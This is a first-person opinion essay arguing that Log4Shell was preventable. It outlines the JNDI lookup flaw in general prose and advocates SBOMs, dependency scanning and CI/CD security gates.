Log4Shell Was Preventable

I still remember when Log4Shell was disclosed on December 9th, 2021, it was one of the most severe vulnerabilities in software history, a single line of untrusted input could trigger remote code execution across virtually every Java application using Log4j 2.

The mechanics of the vulnerability are pretty straightforward, Log4j 2 includes a message lookup feature that evaluates JNDI expressions in log messages, an attacker who can get their string logged by an application can trigger a JNDI lookup to an attacker-controlled server, which responds with a Java class that gets loaded and executed.

This feature was not designed for this purpose, it was designed for dynamic log enrichment, but the capability to fetch and execute remote code via a log statement was always there, waiting to be exploited.

For example, in a typical e-commerce application, the log message might include user input like usernames or product names, this user input could be crafted to trigger a JNDI lookup, and then the attacker-controlled server could respond with a malicious Java class, I have seen cases where this class was a simple reverse shell, giving the attacker full control over the server.

Log4j 2 is used in a huge portion of the Java ecosystem, from enterprise applications to cloud services, game servers, and even IoT firmware, many organisations did not know which of their systems used it because it is frequently a transitive dependency, bundled inside frameworks that bundle other frameworks.

In my experience, the use of transitive dependencies is a major issue, for instance, if an application uses Spring Boot, which in turn uses Log4j 2, the application may not even be aware that it is using Log4j 2, this is where tools like Maven or Gradle can help, by providing a dependency tree that shows all the transitive dependencies.

The first task in the response was inventory, and many organisations had no automated way to do it, they had to manually audit their dependencies, a task that could have been made much easier with a Software Bill of Materials, an SBOM is a machine-readable inventory of every dependency in a software artifact.

Organisations with SBOMs could query for Log4j in minutes, while organisations without spent days auditing dependencies manually, for example, using a tool like CycloneDX, which is a standard for SBOM, organisations can generate a detailed inventory of their dependencies, and then use this inventory to identify vulnerabilities like Log4Shell.

However, even with an SBOM, there are trade-offs to consider, such as the overhead of maintaining the SBOM, and the potential for false positives or false negatives, in my experience, the benefits of an SBOM far outweigh the costs, as it can help organisations respond quickly to vulnerabilities like Log4Shell.

Organisations with SBOMs could also use this information to prioritise their patching efforts, for instance, if an organisation has a critical application that uses Log4j 2, they can prioritise patching this application first, this is where tools like Snyk or Dependabot can help, by providing a risk score for each dependency, and then using this score to prioritise patching efforts.

So what could have been done differently, dependency scanning in CI/CD should be non-negotiable, tools like Dependabot, Snyk, or OWASP Dependency-Check running on every build would have flagged the vulnerable Log4j version, container image scanning should cover both base image vulnerabilities and application dependencies.

In a typical CI/CD pipeline, the scanning tools can be integrated as a gate, which means that if a vulnerability is detected, the build will fail, and the vulnerability will need to be fixed before the build can proceed, this is where the concept of shift-left security comes in, where security is integrated into the development process, rather than being an afterthought.

The gap is not the scanning tools, they exist and are effective, the gap is the adoption and the integration into release gates, many organisations are still not using these tools, or not using them effectively, and that's what needs to change.

For instance, I have seen cases where organisations are using scanning tools, but they are not integrated into the CI/CD pipeline, which means that the vulnerabilities are not being detected in real-time, and the organisation is not able to respond quickly to vulnerabilities like Log4Shell.

The gap is also in the prioritisation of vulnerabilities, many organisations are not prioritising vulnerabilities based on risk, but rather based on other factors like severity or CVSS score, this is where tools like Snyk or Dependabot can help, by providing a risk score for each dependency, and then using this score to prioritise patching efforts.

The gap is not just in the tools, but also in the processes and the culture, many organisations are still not prioritising security, and are not willing to invest the time and resources required to integrate security into the development process, this is what needs to change, and this is where the industry needs to come together to raise the bar for security.